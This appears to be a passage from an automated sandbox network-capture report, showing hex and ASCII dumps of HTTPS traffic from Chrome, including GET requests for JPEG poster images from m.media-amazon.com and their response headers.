                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 8f a3 02 37 ce 5d 3b 2c 70 79 0a 03 de 0f 63 cc 21 26 6a b0 b1 08 1a b3 61 a2 26 ce fd c3 95 0e 1a c3 6e 32 e7 ed da e3 8e 8a 3e 8a d9 7a b2 b5 4a dc 93 e9 c0 10 aa df 14 5c 75 7e f1 22 3d ab c4 26 9b 29 8b 3f 75 5f 4e e3 55 e9 31 0b 73 46 af 82 cc 91 44 4d 33 2d 47 11 90 66 43 fc 33 f0 77 43 ea 76 65 2b e5 f0 b4 ed 39 dd 98 93 b1 53 3d a5 61 e2 8e 4e b1 dc 29 dd d9 5c 55 75 4d 8d 81 f1 ed 31 b3 22 b4 02 19 52 cd 97 6c 6a 00 ef d5 df 80 21 55 be 28 b8 ea dd e2 56 f3 bb 85 6a b2 59 7d b1 e4 99 73 c9 90 dc fe c2 71 2e 18 55 87 03 21 39 cf 24 7d 1a 4b 12 1e e1 3c 23 90 cb a3 b2 7e 89 dd 3b aa a3 92 77 58 c1 31 2a 96 48 e3 e9 74 4a 66 f5 34 fd 82 77 bf 5e 36 c4 72 93 cc fb 8e 33 e9 d1 a0 62 ea 9a 2d ad e8 99 ca 3e 84 59 18 9f 3c 22 07 74 c1 85 5b e2 8f 8e ab
                                                                                                                                                                                          Data Ascii: 7];,pyc!&ja&n2>zJ\u~"=&)?u_NU1sFDM3-GfC3wCve+9S=aN)\UuM1"Rlj!U(VjY}sq.U!9$}K<#~;wX1*HtJf4w^6r3b->Y<"t[
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 59 d3 a6 55 dc 8d 8a 16 69 b9 2c cc 0f 9c be 5d f1 d5 41 58 e5 ea 30 55 08 51 c8 c2 8a 74 52 f4 5c ed dd 15 fe e2 85 0b a6 55 fe 38 f8 32 d5 fb c4 ba f4 61 ab a5 04 78 39 73 c3 2b 56 d3 5a d8 39 8f d3 93 39 4b 23 3a d5 03 99 56 66 5f 4c c9 e9 98 38 6b 03 be a4 8b e9 a2 f4 4c 3c 47 1d 78 7d 4b 17 c2 69 db 2b 09 9d 43 30 7c 85 1e 9d 2c bd 5e 1a 11 43 d5 e4 99 1d 87 74 72 65 14 a2 3d dc 8a 6e d0 90 65 c0 67 6f ec 53 26 55 fe 38 f8 eb 1f a9 68 f5 fa 78 82 52 ca 10 0b 99 d7 d6 6b ce 7b 1b 0a c6 ab 5e b7 bb 4f 97 6d ae 78 92 db bd 9c 5f 42 91 e0 b2 c2 ee ac 87 32 19 45 7d 37 2f f3 18 a7 4d 7d 9d dd 94 9a 86 c5 2e af fd 49 e2 ad 08 bc b2 d4 75 e4 04 fd 83 40 c7 ba 1a 31 c1 d9 e4 c2 29 1d 4d 65 99 4b 69 15 d7 ff 00 5d c7 dd 13 bb f7 12 70 76 76 93 12 03 48 c8 78
                                                                                                                                                                                          Data Ascii: YUi,]AX0UQtR\U82ax9s+VZ99K#:Vf_L8kL<Gx}Ki+C0|,^Ctre=negoS&U8hxRk{^Omx_B2E}7/M}.Iu@1)MeKi]pvvHx
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 4e 48 a6 94 22 ea 73 6b f5 62 ed a8 db 6b 93 3c ad c1 93 f0 af f1 82 24 0a bf c5 1f 1d 67 f5 2d 38 f6 5a 89 12 15 aa 07 87 ba 4e 82 33 96 41 88 07 44 95 fd d7 b4 86 86 09 0d 69 92 f3 6a c2 48 55 87 e4 6a 99 44 b5 08 b9 d5 a6 15 a1 7f d4 04 2b 5b 06 2b b8 5a 26 20 9d c1 38 ad 53 23 0f 31 8e ec 00 2c 65 63 ea 28 03 e3 b1 ac 5b 99 9d d3 be 7a f0 22 72 7c bf da ef c2 b7 c4 09 d0 2a ff 00 14 7c 75 9f d4 8d dc 70 4c 26 d2 8b 10 b3 ad 63 4e f1 81 91 d2 21 96 59 a3 32 25 ae 1e ca 86 be 9e 3d d5 b0 99 7d 46 1b 2c 31 34 32 b5 80 09 06 49 e3 87 e4 d1 c5 a3 aa 0a 5d 56 ac 3d ed 59 1b 57 39 80 32 14 25 1c a3 36 b5 6e 6f 6b c1 24 cf 99 7c 10 a1 84 07 b5 e2 f4 33 7f c7 5b e2 14 fd 10 3a af f1 47 c7 59 fd 5c 34 49 fa 15 77 76 59 5b d0 b2 fa 86 ef 36 46 88 74 8b 71 d0 e7
                                                                                                                                                                                          Data Ascii: NH"skbk<$g-8ZN3ADijHUjD+[+Z& 8S#1,ec([z"r|*|upL&cN!Y2%=}F,142I]V=YW92%6nok$|3[:GY\4IwvY[6Ftq
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: bd 30 cc 51 ba 78 d1 60 3b d9 b1 cb 0d ed 36 ac 1f e9 e6 93 74 5a 55 92 97 9a 27 3e a0 03 d1 aa 4f 2f 34 49 4b 71 ff 00 1c f9 24 5e ce b2 42 dd c9 6a 52 6e 9c d3 4a 58 66 6d 24 f9 72 14 ce 5a cc 9f 89 01 e7 27 29 21 aa f9 f4 3d 19 31 93 1a 2e 5d 10 e9 c0 dd f5 48 06 02 ac 60 ad 49 92 da 83 51 21 66 51 5a 72 9c 1d 1f 67 51 fb 47 8e b1 fa be d9 47 2c 80 14 16 02 18 63 17 93 50 26 6d e8 2d c5 0b 36 6d 6a 5b e3 38 c6 b6 85 29 61 d3 e8 0f bf f9 07 45 80 bd cd 11 73 39 68 a9 03 8b ec ac ec 31 80 3d e9 88 20 dc 02 fb 49 89 4f a8 0c 31 6e 8e 9b 09 ca db e7 0e 59 93 2a 15 5c a2 67 54 ab c1 ce 06 5e 98 59 4c 71 11 75 ae e0 79 da 0f 27 47 0e 5d 82 ef ad 8b f8 57 74 53 34 60 46 ac c6 de e5 95 a7 8e e9 87 24 59 41 ed 1e 3a c7 ea e1 b5 6d 4c c9 9b 0b 09 8d b1 1b 2b 24
                                                                                                                                                                                          Data Ascii: 0Qx`;6tZU'>O/4IKq$^BjRnJXfm$rZ')!=1.]H`IQ!fQZrgQGG,cP&m-6mj[8)aEs9h1= IO1nY*\gT^YLquy'G]WtS4`F$YA:mL+$
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 7e c8 eb a3 3a c1 c1 14 24 51 8d e5 f8 cb d6 62 68 cb ca aa ed 37 17 51 23 2f a8 ec 92 56 1a b2 46 b3 ac 26 b8 8f be 92 dd 04 ed 24 b4 5b 22 ab 34 db e3 0f 43 03 cb 41 d1 c0 1b 12 42 50 e8 ba f1 94 ae 4c 38 ef 07 c5 72 46 d2 02 6f 9e d5 88 e5 2c bd c8 cf 1b bd 3c 57 45 93 38 f7 aa eb 29 75 45 af ca 19 e3 97 ee 6f 77 52 d4 7d c8 5d 05 15 78 eb 11 2f d8 ba bb 98 64 82 50 78 91 1a 22 e5 58 78 44 b9 1e 94 64 52 8e 39 39 0d b3 96 fd 2f 1b 65 8f 8e f0 7c 57 2c 1f d0 d8 63 8e e4 1c 5d 12 fd 61 c2 3f c6 da b4 eb f7 33 da 5a e1 11 0b 51 9f d7 20 bd 56 05 e3 1a 75 72 19 d9 df ac 4a e3 4a b5 ed 15 e2 16 15 5f 12 4b 5a 14 5e 72 c3 69 24 40 ea 9d 5d e4 b2 d0 24 72 10 be 5e 4d e5 b3 b7 8d 72 72 40 de 03 e9 19 60 7e 86 c8 e6 78 db 92 47 62 c1 00 bc f2 5a e3 b4 fc 74 c7
                                                                                                                                                                                          Data Ascii: ~:$Qbh7Q#/VF&$["4CABPL8rFo,<WE8)uEowR}]x/dPx"XxDdR99/e|W,c]a?3ZQ VurJJ_KZ^ri$@]$r^Mrr@`~xGbZt
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: ed d1 b9 62 94 85 41 d8 5a 8c 06 10 f9 65 a8 c7 5c af e5 45 94 03 5b 62 66 fa cf fe c4 b9 4a e9 ad 64 4c 2c 5a 79 e4 ec 40 19 db 9c 08 4b 1e b0 e8 6f 4f fc 20 f0 1b 0c 47 af 5b c5 29 57 e0 e5 dd 1b a1 2c 9f 8e 01 b8 46 8b e6 ee ac dc 2f 00 03 ee eb 2d 65 63 91 96 8c 7a 6c f1 75 3c 8a b6 08 20 66 b9 94 ae 4f fe c4 b9 ad a0 b6 ae a5 76 7f 04 b8 ad c2 43 e0 53 9f bb 0f 81 d5 43 cc b0 ea 2a c0 3f 49 98 22 96 33 f9 5c ee cc 60 d7 79 0c d6 25 f4 a5 db de 11 d7 30 a9 83 df 15 7e 46 55 4a cf 20 e3 23 8c 7c 9d ec c0 a9 37 ca ec 0a 81 9e 99 23 ae 23 14 6c d4 3b b1 19 38 ff 00 b1 36 69 3f b4 87 2f 79 8c f0 ce d0 c7 17 9f 91 c0 9a 1f 36 a5 21 e1 a3 bd 14 c3 b4 5b 19 fa d3 93 1c 28 7c 83 63 2d 69 04 b1 da be f6 58 cc ef 3f 19 56 23 21 1c cb 3b 47 31 e8 b6 a1 65 0d 97
                                                                                                                                                                                          Data Ascii: bAZe\E[bfJdL,Zy@KoO G[)W,F/-eczlu< fOvCSC*?I"3\`y%0~FUJ #|7##l;86i?/y6![(|c-iX?V#!;G1e
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 47 58 ab 78 54 f3 d3 32 9a ff 00 e3 b6 e4 35 81 e2 3a d1 21 97 13 c6 75 ca e5 c4 70 47 12 f5 8b 9c ed 9b 1b 7f 88 bb 3c df 0e df 37 1f 0f 50 06 eb 9e 39 60 26 cd 01 58 fa de 24 cd f7 e4 cd 32 f3 b2 88 63 6f ac 42 fd 04 fe 49 0c a0 07 87 67 52 35 2f 14 72 19 23 47 cb 27 af 46 31 5a 98 d8 41 86 e4 ab fc 62 12 49 27 c2 ed bf 42 a4 d2 e1 8b 8a c5 ce 46 79 77 f8 4f 21 59 01 ca 1b 0f 46 78 6c 00 aa fd 65 12 8f d6 93 34 a3 f7 38 72 e3 ca 2c bf 26 3f 76 26 9d 8e c5 a0 68 38 10 45 8f b5 88 96 46 1b 08 b9 60 a3 61 14 4c a2 48 f7 75 47 1e 9c 73 89 10 38 f2 19 fa d0 e8 2c a0 5a e1 01 c8 0f 25 cf c2 75 f9 b9 ca ae 7d d4 e9 ee 7a da d8 1b 26 1f ad 26 69 8f ee 70 66 cb 64 b2 d8 66 8f d7 e1 72 9d cf d7 40 d0 7d 98 f2 6a b1 fa 6c c4 df 48 c3 64 86 18 9c 29 8b 59 5d d4 f0
                                                                                                                                                                                          Data Ascii: GXxT25:!upG<7P9`&X$2coBIgR5/r#G'F1ZAbI'BFywO!YFxle48r,&?v&h8EF`aLHuGs8,Z%u}z&&ipfdfr@}jlHd)Y]


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          133192.168.2.1649874151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:16 UTC676OUTGET /images/M/MV5BMWY0NzY0NWMtZDg2NC00NjI3LThhNTAtOWY4Y2ZhY2FiMmY4XkEyXkFqcGdeQXVyMTA0MTM5NjI2._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:16 UTC616INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 23259
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 5ca5b68b-bf39-4655-bcdb-d50082f7bc7f
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Sun, 30 Jul 2023 01:20:39 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Mon, 07 Nov 2044 13:31:28 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:16 GMT
                                                                                                                                                                                          Age: 1548137
                                                                                                                                                                                          X-Served-By: cache-iad-kiad7000133-IAD, cache-ewr-kewr1740043-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 c2 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 36 00 00 00 07 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 00 03 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 e1 ae c7 73 91 ec d4 08 e1 00 db 11
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"6s
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 5c 55 d3 4f e6 18 1d 5a b5 e0 7d 3b d3 bb 69 6f 92 b9 77 d0 f4 26 ff 00 98 d7 7e cf f2 4e 6e a6 d3 99 c1 a1 99 17 2d b7 6b ea c8 7d 0e 57 b9 44 a0 2c 64 26 d4 d3 58 df 45 e6 0f 4c 2e dd e5 17 b5 f9 ed 4c 99 69 a3 ac 6e 3b 26 ad 6e 2d b3 1a 6e 27 e7 af ab d5 29 fa f9 71 e9 7d 4f 96 f4 de ff 00 2c c6 17 1b e5 7b b9 5b 9c b6 46 d2 bb 3b 8f a1 fc a5 e9 87 c9 d1 4f 3b 5f 75 3a f6 a0 5a b0 5c 02 ab 07 8b 79 9f e8 86 3b 2f 4f c0 ce eb b2 99 3d 04 80 d8 4d 4e 25 28 05 68 22 29 e9 1f 2b f6 ac af 5f c8 79 e7 63 91 e9 34 de e3 c1 78 3d 22 de 27 12 f8 c5 5b cf f4 f2 ba 5c fe 3d 26 fc 7e 84 ef 78 4f 48 23 5e f2 2a 5e 55 b3 87 ca 98 b0 a0 a3 af 62 a0 bc 3d c2 70 8e 4d ae 93 92 93 e5 ed 56 7c 15 65 7d 77 d8 7e 72 ae cc df 4b e3 f8 87 d1 9a 78 bd 3f cd 9e 9b 49 1f 34 53
                                                                                                                                                                                          Data Ascii: \UOZ};iow&~Nn-k}WD,d&XEL.Lin;&n-n')q}O,{[F;O;_u:Z\y;/O=MN%(h")+_yc4x="'[\=&~xOH#^*^Ub=pMV|e}w~rKx?I4S
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 28 8d 6d 35 11 46 52 08 e4 20 62 00 40 a1 35 24 08 66 03 04 38 04 89 00 48 a3 00 10 90 24 00 08 02 00 30 00 20 64 80 88 b6 c0 65 04 04 45 2c 00 ca 50 12 d0 b0 15 81 81 08 48 12 05 00 62 40 02 13 80 03 ff c4 00 32 10 00 01 03 03 02 03 07 03 04 03 01 01 00 00 00 00 01 00 02 03 04 11 12 05 10 13 21 31 06 14 16 20 22 30 32 15 40 41 23 33 34 42 24 50 51 61 52 ff da 00 08 01 01 00 01 08 02 f6 1a 32 36 1d d2 6f f4 9a 66 9b de ce 4e 8a 06 42 31 62 af a0 6d 5b 10 8d c4 5d 77 59 79 2e 04 97 c5 0a 79 1c e2 c1 c1 7a e0 3d 77 49 6f 64 60 78 eb c1 7d ae bb 9c c8 51 ca 72 09 b4 b2 bb a7 05 fd 53 a9 de d0 e2 5d 49 2b 6d 73 4d 23 71 bf 01 e9 b4 73 3a d6 ee 53 21 03 dc 0b 84 b0 ba 23 67 fb 8c 69 79 0d 14 f0 88 18 d8 db a9 d6 f7 48 f2 1a 3e a1 2d 51 90 48 8c ee 82 59 da 3b
                                                                                                                                                                                          Data Ascii: (m5FR b@5$f8H$0 deE,PHb@2!1 "02@A#34B$PQaR26ofNB1bm[]wYy.yz=wIod`x}QrS]I+msM#qs:S!#giyH>-QHY;
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 92 89 96 55 6c fc a7 cd c1 3c fb e3 7a 06 c0 4a a8 a7 f4 aa b3 9e 0f 40 2c 56 2a de f9 1b 8e 6b a6 c3 9a e8 82 e8 9e 3f 2b 4f a2 fe c5 c3 10 bb d3 94 95 64 f2 33 52 71 3a 45 42 d6 1c 87 10 ba e0 4a ca 80 3d 0e 25 ef c7 ec c2 70 d9 a6 cb ae fd 76 3c d5 2d 27 4c a2 8b 1d 89 53 82 f1 cb 10 f0 f2 5a d6 e2 a8 a3 2e b9 59 ba f6 1a 9c 20 8e 33 22 8e 42 bf f0 fb f7 db aa 23 66 14 46 c0 a2 df f9 4f a7 ba 23 93 a9 59 7f 52 e8 9f 28 0a 5a dc 3a ba b5 d2 7c 20 a4 3f 29 24 c7 88 a2 66 79 e3 1b f8 97 be a3 e9 0e 41 d2 33 e2 d1 de 1b ea 7c 66 3e be ed d5 f6 09 c2 fb b4 dd 1e 5b 69 14 e0 7a cb df 73 66 b2 9c 36 e8 46 14 94 9f 91 f4 c9 2f 74 e8 a5 8d 1a 97 9e 8e 73 59 fb 94 95 f6 90 de 49 40 78 90 6a 0c e2 30 d9 86 e0 2c 4d ee 1b 37 a6 d2 02 87 b4 d6 97 9b 08 99 c4 36 40
                                                                                                                                                                                          Data Ascii: Ul<zJ@,V*k?+Od3Rq:EBJ=%pv<-'LSZ.Y 3"B#fFO#YR(Z:| ?)$fyA3|f>[izsf6F/tsYI@xj0,M76@
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: b3 b7 c9 13 e4 a6 3c 88 52 cd ca c2 08 f1 e6 87 2b d9 3e 10 7a 3a 9a cc 2f 50 c5 90 ba 0c b2 b9 46 f6 24 5c 7e 26 79 79 f6 63 66 45 17 65 e9 64 50 91 d6 d6 f2 cd 1e 06 e1 a7 8a d4 5b 6e 5e 78 1d 62 b8 03 ae ee 78 67 5e f0 15 51 c6 38 53 67 20 59 77 95 de 42 6c ac 53 cd 97 25 96 d8 7a 6f e6 63 33 4e 8c 47 64 c6 63 e7 2d c9 7e cb 95 43 6e 32 f6 23 7e 43 6e 88 9b f3 2c 6e 64 34 57 3b 29 1d 6d c3 15 b6 b2 80 b5 a6 cf a9 a7 e0 93 6d d8 cc d3 7f 40 35 0f c9 3e c4 b1 e6 14 47 ab 0f 98 0f fa 1d 6e 8d 39 74 9a 17 42 f2 c7 9e 4a 8f 93 b2 52 f2 e4 80 ba c7 6b a3 b5 f6 e3 02 dc 4e d1 c7 99 40 08 80 28 0e a4 fb 53 c7 f9 16 27 ca 02 e4 a2 89 d2 fc 34 ba 6e 0c f1 ba 5d 7a 99 cf 7b 66 64 8c 70 27 38 e4 2c b8 4c a7 7c e4 90 cd 39 e7 ad 35 33 20 ba 9f 4f 8c db ce 05 d3 23
                                                                                                                                                                                          Data Ascii: <R+>z:/PF$\~&yycfEedP[n^xbxg^Q8Sg YwBlS%zoc3NGdc-~Cn2#~Cn,nd4W;)mm@5>Gn9tBJRkN@(S'4n]z{fdp'8,L|953 O#
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 5e 58 bd a1 b1 95 78 35 05 5c 15 04 18 a3 62 31 d0 8e 9c 86 88 15 87 0b 18 d4 de 2c 7c 0a 58 6d 1b e3 ac 1f 89 5d 19 a9 8a a7 99 3d 14 f9 84 82 35 08 96 03 61 e0 2c b8 22 f6 eb 2e 4c ab 3c b8 35 9a 9f da 11 61 13 97 4e 49 5d ac cc d7 33 31 32 b4 bb c3 23 0b 4d 63 89 4b bf dc e3 23 9e 0a 11 55 42 af 4e 53 de e3 e6 ff 00 ad 65 e1 69 bd 1d 84 b7 9e ac 1d 04 b3 13 b8 b0 a3 03 e5 1b d0 0e a4 37 10 28 27 d9 45 5f 4b a3 f9 3e f9 06 4d c3 6f 9e 22 ec be 43 82 6e 6e 6f a5 76 94 6e 41 6c e5 a2 1a ce 30 6c 00 48 71 bf 27 1e 86 4e e4 dd 6a df b3 27 e5 ee 4b 1d 6b af 2b 20 d8 18 73 df 99 dc 84 ee 59 69 b1 fb 49 65 c0 0e da 6e 6e 6f a6 fa 55 92 6b 31 5c 11 b5 e5 3c 40 e3 89 59 a5 86 a0 67 62 1c f4 1e 27 f9 11 1b 3d 9b c0 17 95 52 01 68 4f 4d cf 1d 77 31 49 d1 85 f4 36
                                                                                                                                                                                          Data Ascii: ^Xx5\b1,|Xm]=5a,".L<5aNI]312#McK#UBNSei7('E_K>Mo"CnnovnAl0lHq'Nj'Kk+ sYiIennoUk1\<@Ygb'=RhOMw1I6
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 65 cb 48 6e 3a b4 05 ad ac fb 97 7b 6f 7e c3 20 5e 3f 93 b2 ab 56 a2 b6 cc ee 23 dc dd d5 cd f8 a7 84 c8 b8 06 18 9c 00 a5 bb d8 70 c1 60 e8 3e a0 9a 86 3d 6a c0 ee fc d1 5e 53 9a 2f a6 d4 2b 6b d9 9b 6d 9a f7 43 68 82 1a c2 e7 67 03 10 db 7a 98 d7 a5 63 6f 90 3f d1 61 f1 d9 40 81 a7 1b c8 fb a9 ec b8 02 06 53 f8 1a 80 cd c3 33 72 bd 9c 6b 2c 1b 96 de d6 7d b2 e8 b0 0e 48 d9 2b 8d 41 ba f4 ac e4 f2 0f 80 88 95 e2 85 e5 2c b1 af af 93 5b 28 65 b5 90 ab 15 24 ea 2c aa f6 a9 d6 c4 6b 72 5e 83 60 ad b2 94 97 a2 9f 51 e5 d4 da ba af 54 e3 b7 d3 a6 40 60 08 2e 27 31 72 8c 75 4f 06 05 d1 df 8c 56 5c 64 39 0f 8b 83 65 f6 fc 8c 95 a9 57 f1 99 c2 0c 77 19 29 97 47 da de a5 77 35 e1 52 ec 9c 34 aa aa 70 52 a4 15 8c 9b b0 ce eb be b6 c4 19 2c 5d 72 70 47 dd 0b ca db
                                                                                                                                                                                          Data Ascii: eHn:{o~ ^?V#p`>=j^S/+kmChgzco?a@S3rk,}H+A,[(e$,kr^`QT@`.'1ruOV\d9eWw)Gw5R4pR,]rpG
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: a5 7c 16 0b ee f8 58 2f bb e1 60 be ef 85 83 fb be 16 08 7f 2f 85 83 1b d6 0c 6f 58 31 bd 60 c6 f5 83 1b d6 0c 6f 4c 1b d3 02 63 53 5a 9a d4 d6 a6 35 35 a9 ad 4d 6a 6b 53 5b bb e5 06 ee f9 41 bb be 55 5d fe c3 28 fd 10 19 a8 68 8c 86 f9 a9 8d 71 4d ed 46 36 1d 87 e8 03 86 29 db 04 ee a8 8e 8a cd 4b f3 51 55 26 7a 15 1a 07 b7 7d a5 ea 7a 68 10 42 47 15 69 ee ab 1d 69 ba 5a e9 c8 5a 35 0d 2a 51 55 b6 1d f2 b7 fb 2e c8 e9 3a 96 7b da 9f 21 3e ac a7 66 e4 76 c6 3d f6 ee 95 0a 3a 9f 6f bc 50 c9 1c fb dd 4a 99 38 ad c4 6b 8e b4 3b 3b f5 bc 15 88 62 2e e0 89 88 54 92 86 a5 2e b5 3e 85 62 2a 6a 46 eb 14 8d 1c 2e ef 93 d0 2c e8 6e 4c 5b 97 e7 ed 55 a7 9f e7 bc e2 bb 41 78 c7 16 cd 15 da 17 77 9a 91 bb 15 ba 57 34 61 c4 28 14 11 47 62 a1 f4 f7 5b 71 c9 4e e3 e9 9d
                                                                                                                                                                                          Data Ascii: |X/`/oX1`oLcSZ55MjkS[AU](hqMF6)KQU&z}zhBGiiZZ5*QU.:{!>fv=:oPJ8k;;b.T.>b*jF.,nL[UAxwW4a(Gb[qN
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 8c dd 77 94 6d 28 36 06 80 be 06 0d b1 a4 70 6b c4 38 f8 97 5a f7 d1 5d 2b 12 95 5f 5a bd 7a c3 02 b9 70 bd 23 79 ca e0 9b 0e 82 8d 59 7b 11 85 9c 6c a2 ce 04 dd 6a 1c b3 2a 46 30 cf 8b 6d 76 0f cd 2c 37 35 5d c9 f3 c6 ba c1 ae 51 d1 d1 68 45 dc 5b 92 2e 0d 94 8e da b9 fd 5d 06 8e ac bd a5 1b 03 40 e7 20 0a 27 26 34 d7 58 af 42 ab 37 9b 66 6f a6 8c 7a a2 63 cd 70 b0 55 5a 2b 26 a9 a6 ab 52 f3 34 7c 07 b8 70 d2 00 7f 5d 5b 76 51 ab cd ab 34 4e 7c 52 c9 b0 c6 2f 16 ef 50 ea 0b 52 de 85 67 24 0a 0d a6 e8 1d d9 14 1c 5d 03 14 d7 0e a4 0f 67 08 91 87 77 29 cb a7 77 42 75 11 1d 5f 8f 15 f8 fa 0a e7 91 8f 77 87 5c 07 d7 19 bb 4a e9 b3 cc 9d 69 85 3a c5 fc be 25 9f 60 6a 54 d7 7f a7 97 91 36 4e 5e df f5 a5 f2 e0 7e a7 29 67 ea eb e9 dd e1 99 cc 7e 0f 9c bd 77 5e
                                                                                                                                                                                          Data Ascii: wm(6pk8Z]+_Zzp#yY{lj*F0mv,75]QhE[.]@ '&4XB7fozcpUZ+&R4|p][vQ4N|R/PRg$]gw)wBu_w\Ji:%`jT6N^~)g~w^
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 6a 7c a6 b3 da 18 0d 42 ba e9 14 cd 2f 77 12 f2 fe 81 bd c5 d3 00 5f 3a 88 87 57 67 cb a0 18 ad 2b cc 88 1b 1e ae fb 34 96 6b 9f cc 24 e0 3c 4f 86 88 70 94 cc 30 98 f0 9c 15 99 b5 2b 88 81 69 82 15 ed 90 fe ba 4a 61 ca 67 e5 c3 cf fb 85 52 f3 8b 95 6f 10 bc e7 10 41 34 96 3f 99 41 b7 bd 5e 6f 32 09 80 2b b4 cb fb cc 20 80 95 fc b6 12 a1 88 eb 03 47 07 a2 25 a2 b8 37 97 95 99 29 ce 9e 8f ef ee f2 96 88 44 f9 53 0f 41 4d c8 16 0e 3c ec 7a d0 fb c2 4d 50 8b 41 10 e9 42 ae e1 f9 63 7c 87 3e 6e 5b c6 a2 ad af 58 66 54 20 7f 3b ae 2d b8 94 83 34 89 58 35 05 23 e5 93 cb 62 08 38 56 5c 08 e9 7a 47 9e b0 3f 79 47 d1 cd db be d0 03 4e 4a f4 f6 71 7b ed 2c 76 06 ab 2b f2 40 da c7 30 9f be 64 d8 6f e6 68 d1 4f 03 f8 d9 72 f8 8c 25 5c 36 e6 f4 25 71 94 a5 ae 81 95 f2
                                                                                                                                                                                          Data Ascii: j|B/w_:Wg+4k$<Op0+iJagRoA4?A^o2+ G%7)DSAM<zMPABc|>n[XfT ;-4X5#b8V\zG?yGNJq{,v+@0dohOr%\6%q


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          134192.168.2.1649875151.101.65.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:16 UTC445OUTGET /images/M/MV5BMmRkMTVlNTEtOWQxNC00OGY4LWIzMzQtMjY2MTZjNDU2N2ViXkEyXkFqcGdeQXVyNjMwMjk0MTQ@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:16 UTC616INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 27970
                                                                                                                                                                                          Content-Type: image/jpeg
